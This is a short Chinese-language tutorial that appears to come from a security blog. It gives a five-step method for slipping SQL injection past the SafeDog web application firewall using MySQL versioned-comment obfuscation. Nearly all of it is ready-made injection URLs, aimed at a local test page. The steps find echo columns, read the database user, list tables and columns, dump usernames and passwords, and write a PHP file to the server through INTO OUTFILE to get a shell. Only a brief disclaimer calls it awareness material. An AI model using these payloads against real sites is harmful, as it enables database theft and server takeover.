绕过安全狗_绕过安全狗五步法

今天分享绕过安全狗的方法，各位帽子兄弟研阅。

PS：测试请断网,据说log会上传,哈哈

熟悉的页面，没错绕过它，核心方法:Mysql注释绕过

环境:

001 利用数据回显获取用户信息

找出回显字段

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))

002 获取当前表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

003 获取当前表的所有列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

004 获取当前表的数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password) from/*!`users`*/)

005 Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

法律声明:本文仅供参考,希望能对大家提高网络安全意识有所帮助,若需转载请注明出处.